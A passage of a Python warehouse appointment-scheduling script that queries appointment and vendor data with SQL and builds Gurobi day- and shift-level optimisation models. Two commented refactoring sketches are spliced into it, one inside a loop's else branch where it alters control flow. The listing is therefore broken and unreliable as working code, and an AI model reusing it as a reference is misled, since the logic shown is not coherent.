zip(df.appointment_id,df.PO_number,df.Date,df.Time))\r\n \r\n else:\r\n pass\r\n logger.info(\"Getting Reschedule appointment data\")\r\n \r\n #scheduling standing appointment\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, apl.request_time:: TIME, apl.vendor\r\n FROM aad.t_appt_appointment_log AS apl\r\n LEFT JOIN aad.t_appt_appointment_log AS pol\r\n USING(appointment_id)\r\n WHERE apl.request_date:: DATE BETWEEN current_date+1 AND current_date+60 AND LOWER(apl.status) <> 'cancelled' AND apl.standing_appt_id IS NOT NULL AND apl.vendor IS NOT NULL AND apl.wh_id = 'DFW1' AND pol.po_number IS NULL AND dayofweek(apl.request_date) NOT IN (1,7)\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','tm','vendor']\r\n stnd_date = {str(k):g['dt'].unique().tolist() for k,g in df.groupby('vendor')}\r\n stnd_time = {str(k):g['tm'].unique().tolist()for k,g in df.groupby('vendor')}\r\n stnd_fl = dict([(str(i),str(j),str(k)),'0'] for i,j,k in zip(df.dt,df.tm,df.vendor))\r\n \r\n for i in stnd_date.keys():\r\n for j in range(1,len(stnd_date[i])+1):\r\n stnd_date[i][j-1] = str(stnd_date[i][j-1])\r\n for k in range(1,len(stnd_time[i])+1):\r\n stnd_time[i][k-1] = str(stnd_time[i][k-1])\r\n \r\n #standing appointment_vendor_units \r\n query = \"\"\"\r\n with standings_history as (\r\n select distinct poq.\"Location Code\",poq.appt_date,poq.No_,poq.standing_appt_id,poq.\"Buy-from Vendor No_\",poq.appt_quantity_fill,sum(pdm.document_receipt_hj_quantity) as received_units,count(pdm.product_part_number) as SKU_count\r\n from sandbox_supply_chain.scheduled_po_quantity poq \r\n left join chewybi.procurement_document_product_measures pdm on pdm.document_number = poq.No_ and poq.appt_date::date = pdm.appointment_dttm::date\r\n where poq.appt_date >= timestampadd('month',-3,current_date)\r\n and standing_appt_id is not null\r\n group by 1,2,3,4,5,6)\r\n \r\n ,standings_schedule as (\r\n select distinct wh_id, standing_appt_id, request_time:: TIME AS scheduled_time, date_part('dow',request_date) as dow, vendor, vendor_name, units_expected\r\n from aad.t_appt_appointment_log aal left join chewybi.vendors v on aal.vendor = v.vendor_number\r\n where standing_appt_id is not null and units_expected is not null and request_date::date > current_date)\r\n \r\n ,final AS (\r\n select ss.wh_id,\r\n ss.dow,\r\n ss.scheduled_time,\r\n ss.standing_appt_id,\r\n vendor,\r\n --case vendor\r\n --when '00000004' then 'SAIA LTL'\r\n 
--when '00000007' then 'YRC LTL'\r\n --when '00000002' then 'UPS LTL'\r\n --when '000000012' then 'ESTES LTL'\r\n --when '9000' then 'FEDEX LTL'\r\n --else vendor_name end as vendor_or_carrier,\r\n ss.units_expected as units_expected,\r\n sum(sh.appt_quantity_fill)/count(distinct sh.appt_date::date) as scheduled_units_per_day,\r\n isnull(sum(sh.received_units)/nullif(sum(sh.SKU_count),0),0) as UPT\r\n from standings_schedule ss \r\n join standings_history sh \r\n on ss.wh_id = sh.\"Location Code\" \r\n and ss.dow = date_part('dow',sh.appt_date) \r\n and ss.standing_appt_id = sh.standing_appt_id\r\n where vendor not in ('AVP1','CFC1','DAY1','DFW1','EFC3','MCO1','PHX1','WFC2') and ss.wh_id = 'DFW1'\r\n group by 1,2,3,4,5,6\r\n order by 1,4,2\r\n )\r\n SELECT vendor, CASE WHEN dow <> 5 AND scheduled_time BETWEEN '04:00:00' AND '15:30:00' THEN 1 WHEN dow = 5 AND scheduled_time BETWEEN '04:00:00' AND '16:00:00' THEN 1 ELSE 2 END AS shift, ROUND(AVG(scheduled_units_per_day),0) AS Units, ROUND((AVG(scheduled_units_per_day) /AVG(UPT)),0) AS SKU\r\n FROM final\r\n GROUP BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['y','x','r','t']\r\n v_units = dict([(str(i),str(j)),[float(k),float(l)]] for i,j,k,l in zip(df.y,df.x,df.r,df.t))\r\n logger.info(\"Getting Standing Appointment Data\")\r\n query = \"\"\"\r\n WITH break AS \r\n (\r\n SELECT apl.appointment_id,apl.request_date:: DATE, apl.request_time:: TIME,COUNT(DISTINCT pol.po_number) AS po_count, (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) AS hj_rank\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n WHERE apl.status <> 'Cancelled' AND apl.request_date:: DATE BETWEEN current_date AND current_date+60 AND apl.wh_id = 'DFW1'\r\n GROUP BY 1,2,3\r\n ORDER BY 1,2\r\n )\r\n ,break_final AS \r\n ( \r\n SELECT appointment_id,request_date,request_time, CASE WHEN po_count > 1 or hj_rank < 35 THEN 1 ELSE 0 END AS bulk_or_breakdown\r\n FROM break\r\n ORDER BY 2,3\r\n )\r\n SELECT request_date,request_time,bulk_or_breakdown\r\n FROM break_final\r\n WHERE bulk_or_breakdown = 1\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['Dt','tm','bi']\r\n temp_bulk = dict([(str(i),str(j)),str(k)] for i,j,k in zip(df.Dt,df.tm,df.bi))\r\n logger.info(\"Initializing breakdown slots\")\r\n \r\n ref = {}\r\n units = {}\r\n slot = {}\r\n #scheduling stand_appointments\r\n for j in dt.keys():\r\n for k in dt[j]:\r\n if k in ref:\r\n ref[k].append(j)\r\n else:\r\n ref[k] = [j]\r\n \r\n for j in ref.keys():\r\n if j in sch_dict:\r\n pass\r\n #sch_dict[j] = [0,0,0]\r\n else:\r\n sch_dict[j] = [0,0,0]\r\n for j in sch_dict.keys():\r\n for k in range(1,3):\r\n if (j,str(k)) in sch_sh:\r\n pass\r\n #sch_sh[(j,str(k))] = [0,0,0]\r\n else:\r\n sch_sh[(j,str(k))] = [0,0,0]\r\n for j in sch_dict.keys():\r\n for k in day_slots[date_fl[j]]:\r\n if (j,k) in sch_slot:\r\n pass\r\n #sch_slot[(j,k)] = 0\r\n else:\r\n sch_slot[(j,k)] = 0\r\n for k in night_slots[date_fl[j]]:\r\n if (j,k) in sch_slot:\r\n pass\r\n #sch_slot[(j,k)] = 0\r\n else:\r\n sch_slot[(j,k)] = 0\r\n \r\n for j in ref.keys():\r\n if j in sch_vas:\r\n pass\r\n #sch_vas[j] = 0\r\n else:\r\n sch_vas[j] = 0\r\n \r\n for j in sch_vas.keys():\r\n for k in range(1,3):\r\n if (j,str(k)) in sch_vas_sh:\r\n pass\r\n #sch_sh[(j,str(k))] = [0,0,0]\r\n else:\r\n sch_vas_sh[(j,str(k))] = 0\r\n \r\n for j in ref.keys():\r\n for k in 
day_slots[date_fl[j]]:\r\n if (j,k) in sch_vas_fl:\r\n pass\r\n #sch_vas_fl[(j,k)] = '0'\r\n else:\r\n sch_vas_fl[(j,k)] = '0'\r\n for k in night_slots[date_fl[j]]:\r\n if (j,k) in sch_vas_fl:\r\n pass\r\n #sch_vas_fl[(j,k)] = '0'\r\n else:\r\n sch_vas_fl[(j,k)] = '0'\r\n \r\n for j in ref.keys():\r\n if j in cont_appt:\r\n pass\r\n else:\r\n cont_appt[j] = 4\r\n for (i,j) in sch_sh.keys():\r\n if j == '1':\r\n slot_count[(i,j)] = len(day_slots[date_fl[i]])*2 + 4 \r\n elif j == '2' and date_fl[i] == '0':\r\n slot_count[(i,j)] = len(night_slots[date_fl[i]])*2 + 4\r\n else:\r\n slot_count[(i,j)] = 0\r\n for j in cont_appt.keys():\r\n if cont_appt[j] < 0:\r\n cont_appt[j] = 0\r\n else:\r\n pass\r\n logger.info(\"Initializing Container appointment slots\") \r\n for j in cont_appt.keys():\r\n if cont_appt[j] == 0:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 1\r\n sch_slot[(j,'15:00:00','c')] = 1\r\n sch_slot[(j,'19:00:00','c')] = 1\r\n elif cont_appt[j] == 1:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 1\r\n sch_slot[(j,'15:00:00','c')] = 1\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n elif cont_appt[j] == 2:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 0\r\n sch_slot[(j,'15:00:00','c')] = 1\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n if (j,'08:00:00') in sch_slot:\r\n sch_slot[(j,'08:00:00')] = sch_slot[(j,'08:00:00')] + 1\r\n else:\r\n sch_slot[(j,'08:00:00')] = 1\r\n elif cont_appt[j] == 3:\r\n sch_slot[(j,'05:00:00','c')] = 1\r\n sch_slot[(j,'08:00:00','c')] = 0\r\n sch_slot[(j,'15:00:00','c')] = 0\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n if (j,'08:00:00') in sch_slot:\r\n sch_slot[(j,'08:00:00')] = sch_slot[(j,'08:00:00')] + 1\r\n else:\r\n sch_slot[(j,'08:00:00')] = 1\r\n else:\r\n sch_slot[(j,'05:00:00','c')] = 0\r\n sch_slot[(j,'08:00:00','c')] = 0\r\n sch_slot[(j,'15:00:00','c')] = 0\r\n sch_slot[(j,'19:00:00','c')] = 0\r\n if (j,'19:00:00') in sch_slot:\r\n sch_slot[(j,'19:00:00')] = sch_slot[(j,'19:00:00')] + 1\r\n else:\r\n sch_slot[(j,'19:00:00')] = 1\r\n if (j,'08:00:00') in sch_slot:\r\n sch_slot[(j,'08:00:00')] = sch_slot[(j,'08:00:00')] + 1\r\n else:\r\n sch_slot[(j,'08:00:00')] = 1\r\n \r\n for j in units_sku_obj.keys():\r\n if j in dt.keys():\r\n for k in range(1,len(dt[j])+1):\r\n if j in objec:\r\n objec[j].append(abs(units_sku_obj[j][2])+k-1)\r\n else:\r\n objec[j] = [abs(units_sku_obj[j][2])+k-1]\r\n \r\n logger.info(\"Starting to schedule standing appointments\") \r\n for j in sch_dict.keys():\r\n units[j] = sch_dict[j][0]\r\n slot[j] = sch_dict[j][2]\r\n \r\n #calculating expected units\r\n for (i,j,k) in stnd_fl.keys():\r\n if stnd_fl[(i,j,k)] == '0':\r\n if j in day_slots[date_fl[i]]:\r\n if(k,'1') in v_units:\r\n if (i,'1') in exp_units:\r\n exp_units[(i,'1')] = exp_units[(i,'1')] + v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n exp_units[(i,'1')] = v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n pass\r\n else:\r\n if(k,'2') in v_units:\r\n if (i,'2') in exp_units:\r\n exp_units[(i,'2')] = exp_units[(i,'2')] + v_units[(k,'2')][0]\r\n else:\r\n 
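# The "if key in d: pass else: d[key] = default" runs above collapse to
# dict.setdefault, which inserts the default only when the key is absent. A sketch
# under the assumption (consistent with the indexing used here) that
# day_slots/night_slots hold lists of time strings:
for j in ref:
    sch_vas.setdefault(j, 0)          # default VAS units already scheduled
    cont_appt.setdefault(j, 4)        # default open container slots
    for s in ('1', '2'):
        sch_vas_sh.setdefault((j, s), 0)
    for k in day_slots[date_fl[j]] + night_slots[date_fl[j]]:
        sch_vas_fl.setdefault((j, k), '0')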
exp_units[(i,'2')] = v_units[(k,'2')][0]\r\n else:\r\n pass\r\n \r\n else:\r\n pass \r\n #required data structures for building model\r\n \r\n for i in ref.keys():\r\n for j in range(1,3):\r\n if (i,str(j)) in exp_units:\r\n pass\r\n else:\r\n exp_units[(i,str(j))] = 0\r\n \r\n std_ref = {}\r\n std_sh = {}\r\n stnd_ref = []\r\n stnd_ref2 = []\r\n stnd_ref3 = []\r\n logger.info(\"Starting to schedule standing appointments\")\r\n for j in dt.keys():\r\n p = 0\r\n if vendor[j] in stnd_date.keys():\r\n for k in dt[j]:\r\n if k in stnd_date[vendor[j]]:\r\n cnt = 1\r\n for l in stnd_time[vendor[j]]:\r\n if (k,l,vendor[j]) in stnd_fl.keys():\r\n cnt = cnt+1\r\n if stnd_fl[(k,l,vendor[j])] == '0' and p == 0 and slot[k] < (slot_count[(k,'1')] + slot_count[(k,'2')]) and units[k] < 1.05 * (f[k][0]+f[k][1]):\r\n if l in ['06:30:00','08:00:00','09:00:00','10:00:00'] and sch_sh[(k,'1')][2] < slot_count[(k,'1')] and date_fl[k] == '0' and (vendor[j],'1') in v_units: \r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(j)\r\n else:\r\n out_3[(k,l)] = [j]\r\n stnd_fl[(k,l,vendor[j])] = '1'\r\n p = 1\r\n exp_units[(k,'1')] = exp_units[(k,'1')] - v_units[(vendor[j],'1')][0]\r\n elif l in ['16:00:00','16:30:00','17:00:00','21:45:00','22:45:00'] and sch_sh[(k,'2')][2] < slot_count[(k,'2')] and date_fl[k] == '0' and (vendor[j],'2') in v_units:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(j)\r\n else:\r\n out_3[(k,l)] = [j]\r\n stnd_fl[(k,l,vendor[j])] = '1'\r\n p = 1\r\n exp_units[(k,'2')] = exp_units[(k,'2')] - v_units[(vendor[j],'2')][0]\r\n elif l in ['06:30:00','07:30:00','09:00:00','10:00:00','16:30:00','21:45:00','22:45:00'] and sch_sh[(k,'1')][2] < slot_count[(k,'1')] and date_fl[k] == '1' and (vendor[j],'1') in v_units:\r\n if (k,l) in out_3:\r\n out_3[(k,l)].append(j)\r\n else:\r\n out_3[(k,l)] = [j]\r\n stnd_fl[(k,l,vendor[j])] = '1'\r\n p = 1\r\n exp_units[(k,'1')] = exp_units[(k,'1')] - v_units[(vendor[j],'1')][0]\r\n else:\r\n pass\r\n if p == 1:\r\n stnd_ref.append(j)\r\n slot[k] = slot[k]+1\r\n units[k] = units[k] + units_sku_obj[j][0]\r\n if (k,l) in sch_slot:\r\n sch_slot[(k,l)] = sch_slot[(k,l)] + 1\r\n else:\r\n sch_slot[(k,l)] = 1\r\n if k in std_ref:\r\n std_ref[k].append(j)\r\n else:\r\n std_ref[k] = [j]\r\n if l in day_slots[date_fl[k]]:\r\n if (k,1) in std_sh:\r\n std_sh[(k,1)].append(j)\r\n else:\r\n std_sh[(k,1)] = [j]\r\n else:\r\n if (k,2) in std_sh:\r\n std_sh[(k,2)].append(j)\r\n else:\r\n std_sh[(k,2)] = [j]\r\n if (k,l,'B000046') in stnd_fl.keys():\r\n if stnd_fl[(k,l,'B000046')] == '1':\r\n sch_vas_fl[(k,l)] = '1'\r\n gh = 0\r\n for d in sorted(day_slots[date_fl[k]]):\r\n if d == l and gh != 0 and gh != len(day_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[k]]):\r\n sch_vas_fl[(k,day_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1\r\n \r\n gh = 0\r\n for d in sorted(night_slots[date_fl[k]]):\r\n if d == l and gh != 0 and gh != len(night_slots[date_fl[k]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[k]]):\r\n sch_vas_fl[(k,night_slots[date_fl[k]][w])] = '2'\r\n gh = gh+1 \r\n else:\r\n if p == 0 and slot[k] + 1 < (slot_count[(k,'1')] + slot_count[(k,'2')]) -5 and units[k] + exp_units[(k,'1')] + exp_units[(k,'2')] + units_sku_obj[j][0] < 1.05 * (f[k][0]+f[k][1]) and cnt > len(stnd_time[vendor[j]]):\r\n if k in std_ref:\r\n std_ref[k].append(j)\r\n 
else:\r\n std_ref[k] = [j]\r\n p = 1\r\n slot[k] = slot[k] + 1\r\n units[k] = units[k] + units_sku_obj[j][0]\r\n stnd_ref3.append(j)\r\n else:\r\n pass\r\n else:\r\n pass\r\n else:\r\n pass\r\n for i,j in out_3.keys():\r\n for k in out_3[(i,j)]:\r\n if b[k] == '1':\r\n temp_bulk[(i,j)] = '1'\r\n for i in sch_dict.keys():\r\n if date_fl[i] == '0':\r\n if (sch_dict[i][0] < 1.05 * (f[i][0]+f[i][1])) and (sch_sh[(i,'1')][2] >= len(day_slots[date_fl[i]])*2 or sch_sh[(i,'2')][2] >= len(night_slots[date_fl[i]])*2):\r\n slot_count[(i,'1')] = len(day_slots[date_fl[i]])*3 \r\n slot_count[(i,'2')] = len(night_slots[date_fl[i]])*3 \r\n else:\r\n pass\r\n else:\r\n if (sch_dict[i][0] < 1.05 * f[i]) and (sch_sh[(i,'1')][2] >= len(day_slots[date_fl[i]])*2):\r\n slot_count[(i,'1')] = len(day_slots[date_fl[i]])*3 \r\n else:\r\n pass\r\n logger.info(\"Standing Appointment Scheduled\")\r\n #adding exsisting standing appointment slots\r\n for (i,j,k) in stnd_fl.keys():\r\n if stnd_fl[(i,j,k)] == '0':\r\n if (i,j) in sch_slot:\r\n sch_slot[(i,j)] = sch_slot[(i,j)]+1\r\n if i in sch_dict:\r\n sch_dict[i][2] = sch_dict[i][2] + 1\r\n else:\r\n sch_dict[i] = [0,0,0]\r\n sch_dict[i][2] = 1\r\n if j in day_slots[date_fl[i]]:\r\n if (i,'1') in sch_sh:\r\n sch_sh[(i,'1')][2] = sch_sh[(i,'1')][2] + 1\r\n else:\r\n sch_sh[(i,'1')] = [0,0,0]\r\n sch_sh[(i,'1')][2] = 1\r\n else:\r\n if (i,'2') in sch_sh:\r\n sch_sh[(i,'2')][2] = sch_sh[(i,'2')][2] + 1\r\n else:\r\n sch_sh[(i,'2')] = [0,0,0]\r\n sch_sh[(i,'2')][2] = 1\r\n else:\r\n sch_slot[(i,j)] = 1\r\n if i in sch_dict:\r\n sch_dict[i][2] = sch_dict[i][2] + 1\r\n else:\r\n sch_dict[i] = [0,0,0]\r\n sch_dict[i][2] = 1\r\n if j in day_slots[date_fl[i]]:\r\n if (i,'1') in sch_sh:\r\n sch_sh[(i,'1')][2] = sch_sh[(i,'1')][2] + 1\r\n else:\r\n sch_sh[(i,'1')] = [0,0,0]\r\n sch_sh[(i,'1')][2] = 1\r\n else:\r\n if (i,'2') in sch_sh:\r\n sch_sh[(i,'2')][2] = sch_sh[(i,'2')][2] + 1\r\n else:\r\n sch_sh[(i,'2')] = [0,0,0]\r\n sch_sh[(i,'2')][2] = 1\r\n #calculating expected units\r\n for (i,j,k) in stnd_fl.keys():\r\n if stnd_fl[(i,j,k)] == '0':\r\n if j in day_slots[date_fl[i]]:\r\n if(k,'1') in v_units:\r\n if (i,'1') in exp_units:\r\n exp_units[(i,'1')] = exp_units[(i,'1')] + v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n exp_units[(i,'1')] = v_units[(k,'1')][0]\r\n print(exp_units[(i,'1')])\r\n else:\r\n pass\r\n else:\r\n if(k,'2') in v_units:\r\n if (i,'2') in exp_units:\r\n exp_units[(i,'2')] = exp_units[(i,'2')] + v_units[(k,'2')][0]\r\n else:\r\n exp_units[(i,'2')] = v_units[(k,'2')][0]\r\n else:\r\n pass\r\n \r\n else:\r\n pass\r\n for (i,j) in sch_sh.keys():\r\n if (i,j) in exp_units:\r\n pass\r\n else:\r\n exp_units[(i,j)] = 0 \r\n \r\n bulk_break = {}\r\n for i in sch_dict.keys():\r\n gh = 0\r\n for j in day_slots[date_fl[i]]:\r\n if (i,j) in temp_bulk.keys():\r\n bulk_break[(i,j)] = '1'\r\n if temp_bulk[(i,j)] == '1' and gh != 0 and gh != len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[i]]):\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[i]]):\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n bulk_break[(i,day_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n else:\r\n bulk_break[(i,j)] = '0'\r\n gh = gh+1\r\n gh = 0\r\n for j in night_slots[date_fl[i]]:\r\n if (i,j) in 
temp_bulk.keys():\r\n bulk_break[(i,j)] = '1'\r\n if temp_bulk[(i,j)] == '1' and gh != 0 and gh != len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[i]]):\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[i]]):\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif temp_bulk[(i,j)] == '1' and gh == len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n bulk_break[(i,night_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n else:\r\n bulk_break[(i,j)] = '0'\r\n gh = gh+1\r\n for (i,j) in slot_count.keys():\r\n if sch_sh[(i,j)][2] >= slot_count[(i,j)]:\r\n slot_count[(i,j)] = sch_sh[(i,j)][2] \r\n else:\r\n pass\r\n logger.info(\"Building LP Model at Day level\")\r\n # Solver Part I\r\n #Initializing day model\r\n while True:\r\n m1 = Model()\r\n #variable declaration\r\n x = {}\r\n slack = {}\r\n for j in dt.keys():\r\n if j not in infeas_ref and j not in stnd_ref2:\r\n for k in dt[j]:\r\n x[j,k] = m1.addVar(lb=0,ub=1,vtype=GRB.BINARY,name='x[%s;%s]' %(j,k))\r\n m1.update()\r\n for j in ref.keys():\r\n slack[j] = m1.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.INTEGER,name='slack[%s]'%(j))\r\n U = m1.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name ='U')\r\n S = m1.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name='S')\r\n #objective function declaration\r\n o ={}\r\n for j in objec.keys():\r\n if j not in infeas_ref and j not in stnd_ref2:\r\n o[j] = quicksum(objec[j][k-1]*x[j,dt[j][k-1]] for k in range(1,len(objec[j])+1))\r\n \r\n m1.setObjectiveN(quicksum(o[j] for j in o.keys()),index = 0,priority = 3, name ='ORDD')\r\n m1.setObjectiveN(U,index = 1,priority = 1, name = 'unit_dist')\r\n m1.setObjectiveN(S,index = 2,priority = 1, name = 'UPT')\r\n m1.setObjectiveN(quicksum(100000000*slack[j] for j in slack.keys()),index = 4,priority = 3, name ='Slack Variable')\r\n #declaring model sense\r\n m1.modelSense = GRB.MINIMIZE\r\n #adding constraints\r\n m1.update()\r\n cap = {}\r\n unit ={}\r\n sku = {}\r\n break_appt ={}\r\n day_assign = {}\r\n appt_assign = {}\r\n stand_appt = {}\r\n con_appt = {}\r\n temp_out1 = {}\r\n slack_cons = {}\r\n vas_cons = {}\r\n vas_appt_assign = {}\r\n for j in ref.keys():\r\n #capacity constraint\r\n cap[j] = m1.addConstr(quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2)-slack[j],GRB.LESS_EQUAL,(1.05*(f[j][0]+f[j][1]))-sch_dict[j][0]-exp_units[j,'1']-exp_units[j,'2'], name ='cap[%s]' %(j))\r\n #cap[j] = m1.addConstr(quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2),GRB.LESS_EQUAL,(1.05*f[j])-sch_dict[j][0]-exp_units[j,'1']-exp_units[j,'2'], name ='cap[%s]' %(j))\r\n #unit distribution constraint\r\n unit[j,1] = m1.addConstr(U,GRB.GREATER_EQUAL,(exp_units[j,'1']+exp_units[j,'2']+sch_dict[j][0]+quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2)-f[j][0]-f[j][1]),name = 'unit[%s;%d]' %(j,1))\r\n unit[j,2] = m1.addConstr(U,GRB.GREATER_EQUAL,(-exp_units[j,'1']-exp_units[j,'2']-sch_dict[j][0]-quicksum(units_sku_obj[k][0]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2)+f[j][0]+f[j][1]),name = 'unit[%s;%d]' %(j,2))\r\n #sku distribution constraint\r\n sku[j] = m1.addConstr(S,GRB.GREATER_EQUAL,sch_dict[j][1]+quicksum(units_sku_obj[k][1]*x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2), name = 
'sku[%s]'%(j))\r\n #vas constraint\r\n vas_cons[j] = m1.addConstr(quicksum(vas_units[k] * x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref),GRB.LESS_EQUAL,8000 - sch_vas[j],name='vas_day[%s]'%(j))\r\n #day assignment constraint\r\n day_assign[j] = m1.addConstr(quicksum(x[k,j] for k in ref[j] if k not in infeas_ref and k not in stnd_ref2), GRB.LESS_EQUAL,(slot_count[(j,'1')]+slot_count[(j,'2')])- sch_dict[j][2], name='day_assign[%s]' %(j))\r\n #container appointment constraints\r\n con_appt[j] = m1.addConstr(quicksum(x[k,j] for k in ref[j] if cnt_fl[k]=='3.0' and k not in infeas_ref and date_fl[j] == '0'),GRB.LESS_EQUAL,cont_appt[j],name='con_appt[%s]' %(j))\r\n m1.update()\r\n for j in dt.keys():\r\n if j not in infeas_ref and j not in stnd_ref2:\r\n appt_assign[j] = m1.addConstr(quicksum(x[j,k] for k in dt[j]), GRB.EQUAL,1, name = 'appt_assign[%s]'%(j))\r\n m1.update()\r\n for j in dt.keys():\r\n if j not in infeas_ref and j not in stnd_ref2 and vas_flag[j] == '1' and j not in std_ref:\r\n vas_appt_assign[j] = m1.addConstr(quicksum(x[j,k] for k in dt[j] if k not in vas_dt),GRB.EQUAL,1)\r\n m1.update()\r\n #standing_appointment_constraint\r\n for j in std_ref.keys():\r\n for k in std_ref[j]:\r\n stand_appt[(j,k)] = m1.addConstr(x[k,j],GRB.EQUAL,1,name='stand_appt[%s;%s]'%(j,k))\r\n m1.Params.timeLimit = 600 #declaring timelimit for running model\r\n m1.write('day_model.lp') #writing the day model\r\n m1.optimize()#Optimizing the day model\r\n #printing Solver Part I Solution\r\n if m1.status == GRB.OPTIMAL or m1.status == GRB.TIME_LIMIT:\r\n for j,k in x.keys():\r\n if x[j,k].x > 0:\r\n if k in out_1:\r\n out_1[k].append(j)\r\n else:\r\n out_1[k]= [j]\r\n break\r\n else:\r\n print(\"The day model became infeasible\")\r\n logging.info(\"The day model became infeasible\")\r\n m1.computeIIS()#computing infeasibility\r\n m1.write('day_model_DFW.ilp')#writing causes of infeasibility\r\n m1.write('day_model_failed.lp')\r\n M1 = M1+1\r\n if len(infeas_ref) + len(stnd_ref) < len(dt.keys()):\r\n a = max(units_sku_obj[j][0] for j in units_sku_obj.keys() if j not in stnd_ref and j not in infeas_ref)\r\n for j in units_sku_obj.keys():\r\n if units_sku_obj[j][0] == a:\r\n infeas_ref.append(j)\r\n else:\r\n pass\r\n else:\r\n break\r\n if m1.status == GRB.OPTIMAL or m1.status == GRB.TIME_LIMIT: \r\n for j in infeas_ref:\r\n for k in ref_num[j]:\r\n infeasible_day[(j,k)] = [str(TODAY),'DFW1','None',str(j),str(k),dt[j][0],cr_dt[j],'NOT_OPTIMAL']\r\n else:\r\n for j in dt.keys():\r\n for k in ref_num[j]:\r\n infeasible_day[(j,k)] = [str(TODAY),'DFW1','None',str(j),str(k),dt[j][0],cr_dt[j],'NOT_OPTIMAL']\r\n df_day = pd.DataFrame(data = infeasible_day.values())\r\n logger.info(\"Solved LP Model at Day level\")\r\n #Solver Part II\r\n #Initializing Shift Model\r\n logger.info(\"Building LP Model at Shift level\")\r\n for j in out_1.keys():\r\n if date_fl[j] == '0':\r\n m2 = Model()\r\n #variable declaration and objective function declaration\r\n y = {}\r\n for k in out_1[j]:\r\n y[j,k,1] = m2.addVar(lb=0,ub=1,vtype=GRB.BINARY, name= 'y[%s;%s;%d]'%(j,k,1))\r\n y[j,k,2] = m2.addVar(lb=0,ub=1,vtype=GRB.BINARY,name='y[%s;%s;%d]'%(j,k,2))\r\n m2.update()\r\n #declaring model Sense\r\n US = m2.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name ='US')\r\n SS = m2.addVar(lb=0,ub=GRB.INFINITY,vtype=GRB.CONTINUOUS,name ='SS')\r\n m2.setObjectiveN(US,index=0,priority=1,name='unit_dist')\r\n m2.setObjectiveN(SS,index=1,priority=1,name='UPT')\r\n m2.modelSense = GRB.MINIMIZE\r\n #adding 
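# The while-loop above retries an infeasible day model after dropping the largest
# still-unscheduled appointment. The same relax-and-retry idea in isolation;
# `build_model` and `sizes` are hypothetical stand-ins for the model construction
# and the units_sku_obj[...][0] lookups (gurobipy assumed, as in the original):
from gurobipy import GRB

def solve_with_relaxation(build_model, candidates, sizes):
    # build_model(excluded) must return a fresh gurobipy Model.
    excluded = []
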